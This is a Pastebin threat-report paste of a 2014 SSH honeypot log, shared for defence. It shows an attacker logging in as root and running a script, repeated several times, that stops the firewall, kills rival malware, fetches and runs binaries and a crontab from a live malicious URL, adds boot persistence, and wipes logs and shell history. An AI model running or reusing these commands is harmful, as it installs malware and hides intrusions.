Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #MalwareMustDie | Case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
- #Follow report: still in the wild
- warning: live URLs
- #Reported log;
- 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] login attempt [root/password] succeeded
- 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] root authenticated with keyboard-interactive
- 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] starting service ssh-connection
- 2014-10-13 10:33:31-0400 [SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] got channel session request
- 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] channel open
- 2014-10-13 10:33:31-0400 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 61.174.50.134:40011 (x.x.x.x) [session: 551]
- 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] executing command "/etc/init.d/iptables stop
- echo "nameserver 8.8.8.8" >> /etc/resolv.conf
- echo "nameserver 8.8.4.4" >> /etc/resolv.conf
- apt-get -y install wget
- yum -y install wget
- chmod 7777 / etc
- killall -9 .IptabLes
- killall -9 nfsd4
- killall -9 profild.key
- cd /etc;rm -rf dir fake.cfg
- killall -9 nfsd
- killall -9 DDosl
- killall -9 lengchao32
- killall -9 b26
- killall -9 khelper
- killall -9 Bill
- killall -9 n26
- killall -9 007
- killall -9 codelove
- killall -9 32
- killall -9 m32
- killall -9 m64
- killall -9 64
- killall -9 83BOT
- killall -9 82BOT
- killall -9 dos64
- killall -9 dos32
- killall -9 new6
- killall -9 new4
- killall -9 node24
- killall -9 mimi
- killall -9 nodeJR-1
- killall -9 freeBSD
- killall -9 ksapdd
- killall -9 106
- killall -9 09
- killall -9 xsw
- killall -9 syslogd
- killall -9 skysapdd
- killall -9 cupsddd
- killall -9 ksapd
- killall -9 atddd
- killall -9 xfsdxd
- killall -9 sfewfesfs
- killall -9 gfhjrtfyhuf
- killall -9 rewgtf3er4t
- killall -9 fdsfsfvff
- killall -9 smarvtd
- killall -9 whitptabil
- killall -9 gdmorpen
- cd /etc;chattr -i 66
- cd /root; chmod 7777 / etc
- killall -9 minerd
- killall -9 syn
- killall -9 joudckfr
- killall -9 www
- killall -9 log
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .Mm2
- killall -9 acpid
- killall -9 m64
- killall -9 ./QQ
- killall -9 aabb
- killall -9 g3
- killall -9 S99local
- killall -9 3
- killall -9 pm
- killall -9 qweasd
- killall -9 tangtang
- killall -9 imap-login
- killall -9 xudp
- killall -9 sshpa
- killall -9 008
- killall -9 txma
- killall -9 mrdos64.b00
- killall -9 mrdos32.b00
- killall -9 kkpklp
- killall -9 kiilp
- killall -9 xin1
- killall -9 jibateng
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeop
- killall -9 .task1
- killall -9 .mimeop
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- cd /root;rm -rf dir nohup.out
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsddd.*
- cd /etc;rm -rf dir atddd.*
- cd /etc;rm -rf dir ksapdd.*
- cd /etc;rm -rf dir kysapdd.*
- cd /etc;rm -rf dir sksapdd.*
- cd /etc;rm -rf dir skysapdd.*
- cd /etc;rm -rf dir xfsdxd.*
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsdd.*
- cd /etc;rm -rf dir atdd.*
- cd /etc;rm -rf dir ksapd.*
- cd /etc;rm -rf dir kysapd.*
- cd /etc;rm -rf dir sksapd.*
- cd /etc;rm -rf dir skysapd.*
- cd /etc;rm -rf dir xfsdx.*
- cd /etc;rm -rf dir sfewfesfs
- cd /etc;rm -rf dir gfhjrtfyhuf
- cd /etc;rm -rf dir rewgtf3er4t
- cd /etc;rm -rf dir fdsfsfvff
- cd /etc;rm -rf dir smarvtd
- cd /etc;rm -rf dir whitptabil
- cd /etc;rm -rf dir gdmorpen
- cd /etc;rm -rf dir sfewfesfs.*
- cd /etc;rm -rf dir gfhjrtfyhuf.*
- cd /etc;rm -rf dir rewgtf3er4t.*
- cd /etc;rm -rf dir fdsfsfvff.*
- cd /etc;rm -rf dir smarvtd.*
- cd /etc;rm -rf dir whitptabil.*
- cd /etc;rm -rf dir gdmorpen.*
- cd /etc;rm -rf dir nhgbhhj.*
- cd /tmp;rm -rf dir 1.*
- cd /tmp;rm -rf dir 2.*
- cd /tmp;rm -rf dir 3.*
- cd /tmp;rm -rf dir 4.*
- cd /tmp;rm -rf dir 5.*
- cd /tmp;rm -rf dir jdhe
- cd /tmp;rm -rf dir jdhe.*
- cd /var/spool/cron; rm -rf dir root.*
- cd /var/spool/cron; rm -rf dir root
- cd /var/spool/cron/crontabs; rm -rf dir root.*
- cd /var/spool/cron/crontabs; rm -rf dir root
- cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
- cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
- yes|mv /tmp/root /var/spool/cron
- yes|mv /tmp/root /var/spool/cron/crontabs
- cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
- cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
- cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
- cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
- cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
- cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
- cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
- cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
- cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
- cd /etc;wget -c http://www.frade8c.com:9162/byv832
- cd /tmp;chmod 7777 jdhe
- cd /etc;chmod 7777 nhgbhhj
- cd /etc;chmod 7777 byv832
- cd /etc;chmod 7777 sfewfesfs
- cd /etc;chmod 7777 gfhjrtfyhuf
- cd /etc;chmod 7777 rewgtf3er4t
- cd /etc;chmod 7777 fdsfsfvff
- cd /etc;chmod 7777 smarvtd
- cd /etc;chmod 7777 whitptabil
- cd /etc;chmod 7777 gdmorpen
- cd /tmp;chmod 7777 nhgbhhj
- cd /tmp;chmod 7777 byv832
- cd /tmp;chmod 7777 sfewfesfs
- cd /tmp;chmod 7777 gfhjrtfyhuf
- cd /tmp;chmod 7777 rewgtf3er4t
- cd /tmp;chmod 7777 fdsfsfvff
- cd /tmp;chmod 7777 smarvtd
- cd /tmp;chmod 7777 whitptabil
- cd /tmp;chmod 7777 gdmorpen
- cd /tmp;./jdhe
- nohup /etc/sfewfesfs > /dev/null 2>&1&
- nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /etc/rewgtf3er4t > /dev/null 2>&1&
- nohup /etc/fdsfsfvff > /dev/null 2>&1&
- nohup /etc/smarvtd > /dev/null 2>&1&
- nohup /etc/whitptabil > /dev/null 2>&1&
- nohup /etc/gdmorpen > /dev/null 2>&1&
- nohup /etc/nhgbhhj > /dev/null 2>&1&
- nohup /etc/byv832 > /dev/null 2>&1&
- nohup /tmp/sfewfesfs > /dev/null 2>&1&
- nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
- nohup /tmp/fdsfsfvff > /dev/null 2>&1&
- nohup /tmp/smarvtd > /dev/null 2>&1&
- nohup /tmp/whitptabil > /dev/null 2>&1&
- nohup /tmp/gdmorpen > /dev/null 2>&1&
- nohup /tmp/nhgbhhj > /dev/null 2>&1&
- nohup /tmp/byv832 > /dev/null 2>&1&
- echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
- echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
- echo "cd /tmp;./smarvtd" >> /etc/rc.local
- echo "cd /tmp;./whitptabil" >> /etc/rc.local
- echo "cd /tmp;./gdmorpen" >> /etc/rc.local
- echo "cd /etc;./sfewfesfs" >> /etc/rc.local
- echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
- echo "cd /etc;./smarvtd" >> /etc/rc.local
- echo "cd /etc;./whitptabil" >> /etc/rc.local
- echo "cd /etc;./gdmorpen" >> /etc/rc.local
- echo "unset MAILCHECK" >> /etc/profile
- cd /etc;chattr +i sfewfesfs
- rm -rf /root/.bash_history
- touch /root/.bash_history
- history -r
- cd /var/log > dmesg
- cd /var/log > auth.log
- cd /var/log > alternatives.log
- cd /var/log > boot.log
- cd /var/log > btmp
- cd /var/log > cron
- cd /var/log > cups
- cd /var/log > daemon.log
- cd /var/log > dpkg.log
- cd /var/log > faillog
- cd /var/log > kern.log
- cd /var/log > lastlog
- cd /var/log > maillog
- cd /var/log > user.log
- cd /var/log > Xorg.x.log
- cd /var/log > anaconda.log
- cd /var/log > yum.log
- cd /var/log > secure
- cd /var/log > wtmp
- cd /var/log > utmp
- cd /var/log > messages
- cd /var/log > spooler
- cd /var/log > sudolog
- cd /var/log > aculog
- cd /var/log > access-log
- cd /root > .bash_history
- history -c"
- 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] exec command: "/etc/init.d/iptables stop
- echo "nameserver 8.8.8.8" >> /etc/resolv.conf
- echo "nameserver 8.8.4.4" >> /etc/resolv.conf
- apt-get -y install wget
- yum -y install wget
- chmod 7777 / etc
- killall -9 .IptabLes
- killall -9 nfsd4
- killall -9 profild.key
- cd /etc;rm -rf dir fake.cfg
- killall -9 nfsd
- killall -9 DDosl
- killall -9 lengchao32
- killall -9 b26
- killall -9 khelper
- killall -9 Bill
- killall -9 n26
- killall -9 007
- killall -9 codelove
- killall -9 32
- killall -9 m32
- killall -9 m64
- killall -9 64
- killall -9 83BOT
- killall -9 82BOT
- killall -9 dos64
- killall -9 dos32
- killall -9 new6
- killall -9 new4
- killall -9 node24
- killall -9 mimi
- killall -9 nodeJR-1
- killall -9 freeBSD
- killall -9 ksapdd
- killall -9 106
- killall -9 09
- killall -9 xsw
- killall -9 syslogd
- killall -9 skysapdd
- killall -9 cupsddd
- killall -9 ksapd
- killall -9 atddd
- killall -9 xfsdxd
- killall -9 sfewfesfs
- killall -9 gfhjrtfyhuf
- killall -9 rewgtf3er4t
- killall -9 fdsfsfvff
- killall -9 smarvtd
- killall -9 whitptabil
- killall -9 gdmorpen
- cd /etc;chattr -i 66
- cd /root; chmod 7777 / etc
- killall -9 minerd
- killall -9 syn
- killall -9 joudckfr
- killall -9 www
- killall -9 log
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .Mm2
- killall -9 acpid
- killall -9 m64
- killall -9 ./QQ
- killall -9 aabb
- killall -9 g3
- killall -9 S99local
- killall -9 3
- killall -9 pm
- killall -9 qweasd
- killall -9 tangtang
- killall -9 imap-login
- killall -9 xudp
- killall -9 sshpa
- killall -9 008
- killall -9 txma
- killall -9 mrdos64.b00
- killall -9 mrdos32.b00
- killall -9 kkpklp
- killall -9 kiilp
- killall -9 xin1
- killall -9 jibateng
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeop
- killall -9 .task1
- killall -9 .mimeop
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- cd /root;rm -rf dir nohup.out
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsddd.*
- cd /etc;rm -rf dir atddd.*
- cd /etc;rm -rf dir ksapdd.*
- cd /etc;rm -rf dir kysapdd.*
- cd /etc;rm -rf dir sksapdd.*
- cd /etc;rm -rf dir skysapdd.*
- cd /etc;rm -rf dir xfsdxd.*
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsdd.*
- cd /etc;rm -rf dir atdd.*
- cd /etc;rm -rf dir ksapd.*
- cd /etc;rm -rf dir kysapd.*
- cd /etc;rm -rf dir sksapd.*
- cd /etc;rm -rf dir skysapd.*
- cd /etc;rm -rf dir xfsdx.*
- cd /etc;rm -rf dir sfewfesfs
- cd /etc;rm -rf dir gfhjrtfyhuf
- cd /etc;rm -rf dir rewgtf3er4t
- cd /etc;rm -rf dir fdsfsfvff
- cd /etc;rm -rf dir smarvtd
- cd /etc;rm -rf dir whitptabil
- cd /etc;rm -rf dir gdmorpen
- cd /etc;rm -rf dir sfewfesfs.*
- cd /etc;rm -rf dir gfhjrtfyhuf.*
- cd /etc;rm -rf dir rewgtf3er4t.*
- cd /etc;rm -rf dir fdsfsfvff.*
- cd /etc;rm -rf dir smarvtd.*
- cd /etc;rm -rf dir whitptabil.*
- cd /etc;rm -rf dir gdmorpen.*
- cd /etc;rm -rf dir nhgbhhj.*
- cd /tmp;rm -rf dir 1.*
- cd /tmp;rm -rf dir 2.*
- cd /tmp;rm -rf dir 3.*
- cd /tmp;rm -rf dir 4.*
- cd /tmp;rm -rf dir 5.*
- cd /tmp;rm -rf dir jdhe
- cd /tmp;rm -rf dir jdhe.*
- cd /var/spool/cron; rm -rf dir root.*
- cd /var/spool/cron; rm -rf dir root
- cd /var/spool/cron/crontabs; rm -rf dir root.*
- cd /var/spool/cron/crontabs; rm -rf dir root
- cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
- cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
- yes|mv /tmp/root /var/spool/cron
- yes|mv /tmp/root /var/spool/cron/crontabs
- cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
- cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
- cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
- cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
- cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
- cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
- cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
- cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
- cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
- cd /etc;wget -c http://www.frade8c.com:9162/byv832
- cd /tmp;chmod 7777 jdhe
- cd /etc;chmod 7777 nhgbhhj
- cd /etc;chmod 7777 byv832
- cd /etc;chmod 7777 sfewfesfs
- cd /etc;chmod 7777 gfhjrtfyhuf
- cd /etc;chmod 7777 rewgtf3er4t
- cd /etc;chmod 7777 fdsfsfvff
- cd /etc;chmod 7777 smarvtd
- cd /etc;chmod 7777 whitptabil
- cd /etc;chmod 7777 gdmorpen
- cd /tmp;chmod 7777 nhgbhhj
- cd /tmp;chmod 7777 byv832
- cd /tmp;chmod 7777 sfewfesfs
- cd /tmp;chmod 7777 gfhjrtfyhuf
- cd /tmp;chmod 7777 rewgtf3er4t
- cd /tmp;chmod 7777 fdsfsfvff
- cd /tmp;chmod 7777 smarvtd
- cd /tmp;chmod 7777 whitptabil
- cd /tmp;chmod 7777 gdmorpen
- cd /tmp;./jdhe
- nohup /etc/sfewfesfs > /dev/null 2>&1&
- nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /etc/rewgtf3er4t > /dev/null 2>&1&
- nohup /etc/fdsfsfvff > /dev/null 2>&1&
- nohup /etc/smarvtd > /dev/null 2>&1&
- nohup /etc/whitptabil > /dev/null 2>&1&
- nohup /etc/gdmorpen > /dev/null 2>&1&
- nohup /etc/nhgbhhj > /dev/null 2>&1&
- nohup /etc/byv832 > /dev/null 2>&1&
- nohup /tmp/sfewfesfs > /dev/null 2>&1&
- nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
- nohup /tmp/fdsfsfvff > /dev/null 2>&1&
- nohup /tmp/smarvtd > /dev/null 2>&1&
- nohup /tmp/whitptabil > /dev/null 2>&1&
- nohup /tmp/gdmorpen > /dev/null 2>&1&
- nohup /tmp/nhgbhhj > /dev/null 2>&1&
- nohup /tmp/byv832 > /dev/null 2>&1&
- echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
- echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
- echo "cd /tmp;./smarvtd" >> /etc/rc.local
- echo "cd /tmp;./whitptabil" >> /etc/rc.local
- echo "cd /tmp;./gdmorpen" >> /etc/rc.local
- echo "cd /etc;./sfewfesfs" >> /etc/rc.local
- echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
- echo "cd /etc;./smarvtd" >> /etc/rc.local
- echo "cd /etc;./whitptabil" >> /etc/rc.local
- echo "cd /etc;./gdmorpen" >> /etc/rc.local
- echo "unset MAILCHECK" >> /etc/profile
- cd /etc;chattr +i sfewfesfs
- rm -rf /root/.bash_history
- touch /root/.bash_history
- history -r
- cd /var/log > dmesg
- cd /var/log > auth.log
- cd /var/log > alternatives.log
- cd /var/log > boot.log
- cd /var/log > btmp
- cd /var/log > cron
- cd /var/log > cups
- cd /var/log > daemon.log
- cd /var/log > dpkg.log
- cd /var/log > faillog
- cd /var/log > kern.log
- cd /var/log > lastlog
- cd /var/log > maillog
- cd /var/log > user.log
- cd /var/log > Xorg.x.log
- cd /var/log > anaconda.log
- cd /var/log > yum.log
- cd /var/log > secure
- cd /var/log > wtmp
- cd /var/log > utmp
- cd /var/log > messages
- cd /var/log > spooler
- cd /var/log > sudolog
- cd /var/log > aculog
- cd /var/log > access-log
- cd /root > .bash_history
- history -c"
- 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Opening TTY log: log/tty/20141013-103331-7357.log
- 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Running exec command "/etc/init.d/iptables stop
- echo "nameserver 8.8.8.8" >> /etc/resolv.conf
- echo "nameserver 8.8.4.4" >> /etc/resolv.conf
- apt-get -y install wget
- yum -y install wget
- chmod 7777 / etc
- killall -9 .IptabLes
- killall -9 nfsd4
- killall -9 profild.key
- cd /etc;rm -rf dir fake.cfg
- killall -9 nfsd
- killall -9 DDosl
- killall -9 lengchao32
- killall -9 b26
- killall -9 khelper
- killall -9 Bill
- killall -9 n26
- killall -9 007
- killall -9 codelove
- killall -9 32
- killall -9 m32
- killall -9 m64
- killall -9 64
- killall -9 83BOT
- killall -9 82BOT
- killall -9 dos64
- killall -9 dos32
- killall -9 new6
- killall -9 new4
- killall -9 node24
- killall -9 mimi
- killall -9 nodeJR-1
- killall -9 freeBSD
- killall -9 ksapdd
- killall -9 106
- killall -9 09
- killall -9 xsw
- killall -9 syslogd
- killall -9 skysapdd
- killall -9 cupsddd
- killall -9 ksapd
- killall -9 atddd
- killall -9 xfsdxd
- killall -9 sfewfesfs
- killall -9 gfhjrtfyhuf
- killall -9 rewgtf3er4t
- killall -9 fdsfsfvff
- killall -9 smarvtd
- killall -9 whitptabil
- killall -9 gdmorpen
- cd /etc;chattr -i 66
- cd /root; chmod 7777 / etc
- killall -9 minerd
- killall -9 syn
- killall -9 joudckfr
- killall -9 www
- killall -9 log
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .Mm2
- killall -9 acpid
- killall -9 m64
- killall -9 ./QQ
- killall -9 aabb
- killall -9 g3
- killall -9 S99local
- killall -9 3
- killall -9 pm
- killall -9 qweasd
- killall -9 tangtang
- killall -9 imap-login
- killall -9 xudp
- killall -9 sshpa
- killall -9 008
- killall -9 txma
- killall -9 mrdos64.b00
- killall -9 mrdos32.b00
- killall -9 kkpklp
- killall -9 kiilp
- killall -9 xin1
- killall -9 jibateng
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeop
- killall -9 .task1
- killall -9 .mimeop
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- cd /root;rm -rf dir nohup.out
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsddd.*
- cd /etc;rm -rf dir atddd.*
- cd /etc;rm -rf dir ksapdd.*
- cd /etc;rm -rf dir kysapdd.*
- cd /etc;rm -rf dir sksapdd.*
- cd /etc;rm -rf dir skysapdd.*
- cd /etc;rm -rf dir xfsdxd.*
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsdd.*
- cd /etc;rm -rf dir atdd.*
- cd /etc;rm -rf dir ksapd.*
- cd /etc;rm -rf dir kysapd.*
- cd /etc;rm -rf dir sksapd.*
- cd /etc;rm -rf dir skysapd.*
- cd /etc;rm -rf dir xfsdx.*
- cd /etc;rm -rf dir sfewfesfs
- cd /etc;rm -rf dir gfhjrtfyhuf
- cd /etc;rm -rf dir rewgtf3er4t
- cd /etc;rm -rf dir fdsfsfvff
- cd /etc;rm -rf dir smarvtd
- cd /etc;rm -rf dir whitptabil
- cd /etc;rm -rf dir gdmorpen
- cd /etc;rm -rf dir sfewfesfs.*
- cd /etc;rm -rf dir gfhjrtfyhuf.*
- cd /etc;rm -rf dir rewgtf3er4t.*
- cd /etc;rm -rf dir fdsfsfvff.*
- cd /etc;rm -rf dir smarvtd.*
- cd /etc;rm -rf dir whitptabil.*
- cd /etc;rm -rf dir gdmorpen.*
- cd /etc;rm -rf dir nhgbhhj.*
- cd /tmp;rm -rf dir 1.*
- cd /tmp;rm -rf dir 2.*
- cd /tmp;rm -rf dir 3.*
- cd /tmp;rm -rf dir 4.*
- cd /tmp;rm -rf dir 5.*
- cd /tmp;rm -rf dir jdhe
- cd /tmp;rm -rf dir jdhe.*
- cd /var/spool/cron; rm -rf dir root.*
- cd /var/spool/cron; rm -rf dir root
- cd /var/spool/cron/crontabs; rm -rf dir root.*
- cd /var/spool/cron/crontabs; rm -rf dir root
- cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
- cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
- yes|mv /tmp/root /var/spool/cron
- yes|mv /tmp/root /var/spool/cron/crontabs
- cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
- cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
- cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
- cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
- cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
- cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
- cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
- cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
- cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
- cd /etc;wget -c http://www.frade8c.com:9162/byv832
- cd /tmp;chmod 7777 jdhe
- cd /etc;chmod 7777 nhgbhhj
- cd /etc;chmod 7777 byv832
- cd /etc;chmod 7777 sfewfesfs
- cd /etc;chmod 7777 gfhjrtfyhuf
- cd /etc;chmod 7777 rewgtf3er4t
- cd /etc;chmod 7777 fdsfsfvff
- cd /etc;chmod 7777 smarvtd
- cd /etc;chmod 7777 whitptabil
- cd /etc;chmod 7777 gdmorpen
- cd /tmp;chmod 7777 nhgbhhj
- cd /tmp;chmod 7777 byv832
- cd /tmp;chmod 7777 sfewfesfs
- cd /tmp;chmod 7777 gfhjrtfyhuf
- cd /tmp;chmod 7777 rewgtf3er4t
- cd /tmp;chmod 7777 fdsfsfvff
- cd /tmp;chmod 7777 smarvtd
- cd /tmp;chmod 7777 whitptabil
- cd /tmp;chmod 7777 gdmorpen
- cd /tmp;./jdhe
- nohup /etc/sfewfesfs > /dev/null 2>&1&
- nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /etc/rewgtf3er4t > /dev/null 2>&1&
- nohup /etc/fdsfsfvff > /dev/null 2>&1&
- nohup /etc/smarvtd > /dev/null 2>&1&
- nohup /etc/whitptabil > /dev/null 2>&1&
- nohup /etc/gdmorpen > /dev/null 2>&1&
- nohup /etc/nhgbhhj > /dev/null 2>&1&
- nohup /etc/byv832 > /dev/null 2>&1&
- nohup /tmp/sfewfesfs > /dev/null 2>&1&
- nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
- nohup /tmp/fdsfsfvff > /dev/null 2>&1&
- nohup /tmp/smarvtd > /dev/null 2>&1&
- nohup /tmp/whitptabil > /dev/null 2>&1&
- nohup /tmp/gdmorpen > /dev/null 2>&1&
- nohup /tmp/nhgbhhj > /dev/null 2>&1&
- nohup /tmp/byv832 > /dev/null 2>&1&
- echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
- echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
- echo "cd /tmp;./smarvtd" >> /etc/rc.local
- echo "cd /tmp;./whitptabil" >> /etc/rc.local
- echo "cd /tmp;./gdmorpen" >> /etc/rc.local
- echo "cd /etc;./sfewfesfs" >> /etc/rc.local
- echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
- echo "cd /etc;./smarvtd" >> /etc/rc.local
- echo "cd /etc;./whitptabil" >> /etc/rc.local
- echo "cd /etc;./gdmorpen" >> /etc/rc.local
- echo "unset MAILCHECK" >> /etc/profile
- cd /etc;chattr +i sfewfesfs
- rm -rf /root/.bash_history
- touch /root/.bash_history
- history -r
- cd /var/log > dmesg
- cd /var/log > auth.log
- cd /var/log > alternatives.log
- cd /var/log > boot.log
- cd /var/log > btmp
- cd /var/log > cron
- cd /var/log > cups
- cd /var/log > daemon.log
- cd /var/log > dpkg.log
- cd /var/log > faillog
- cd /var/log > kern.log
- cd /var/log > lastlog
- cd /var/log > maillog
- cd /var/log > user.log
- cd /var/log > Xorg.x.log
- cd /var/log > anaconda.log
- cd /var/log > yum.log
- cd /var/log > secure
- cd /var/log > wtmp
- cd /var/log > utmp
- cd /var/log > messages
- cd /var/log > spooler
- cd /var/log > sudolog
- cd /var/log > aculog
- cd /var/log > access-log
- cd /root > .bash_history
- history -c"
- 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] CMD: /etc/init.d/iptables stop
- echo "nameserver 8.8.8.8" >> /etc/resolv.conf
- echo "nameserver 8.8.4.4" >> /etc/resolv.conf
- apt-get -y install wget
- yum -y install wget
- chmod 7777 / etc
- killall -9 .IptabLes
- killall -9 nfsd4
- killall -9 profild.key
- cd /etc;rm -rf dir fake.cfg
- killall -9 nfsd
- killall -9 DDosl
- killall -9 lengchao32
- killall -9 b26
- killall -9 khelper
- killall -9 Bill
- killall -9 n26
- killall -9 007
- killall -9 codelove
- killall -9 32
- killall -9 m32
- killall -9 m64
- killall -9 64
- killall -9 83BOT
- killall -9 82BOT
- killall -9 dos64
- killall -9 dos32
- killall -9 new6
- killall -9 new4
- killall -9 node24
- killall -9 mimi
- killall -9 nodeJR-1
- killall -9 freeBSD
- killall -9 ksapdd
- killall -9 106
- killall -9 09
- killall -9 xsw
- killall -9 syslogd
- killall -9 skysapdd
- killall -9 cupsddd
- killall -9 ksapd
- killall -9 atddd
- killall -9 xfsdxd
- killall -9 sfewfesfs
- killall -9 gfhjrtfyhuf
- killall -9 rewgtf3er4t
- killall -9 fdsfsfvff
- killall -9 smarvtd
- killall -9 whitptabil
- killall -9 gdmorpen
- cd /etc;chattr -i 66
- cd /root; chmod 7777 / etc
- killall -9 minerd
- killall -9 syn
- killall -9 joudckfr
- killall -9 www
- killall -9 log
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .Mm2
- killall -9 acpid
- killall -9 m64
- killall -9 ./QQ
- killall -9 aabb
- killall -9 g3
- killall -9 S99local
- killall -9 3
- killall -9 pm
- killall -9 qweasd
- killall -9 tangtang
- killall -9 imap-login
- killall -9 xudp
- killall -9 sshpa
- killall -9 008
- killall -9 txma
- killall -9 mrdos64.b00
- killall -9 mrdos32.b00
- killall -9 kkpklp
- killall -9 kiilp
- killall -9 xin1
- killall -9 jibateng
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeop
- killall -9 .task1
- killall -9 .mimeop
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
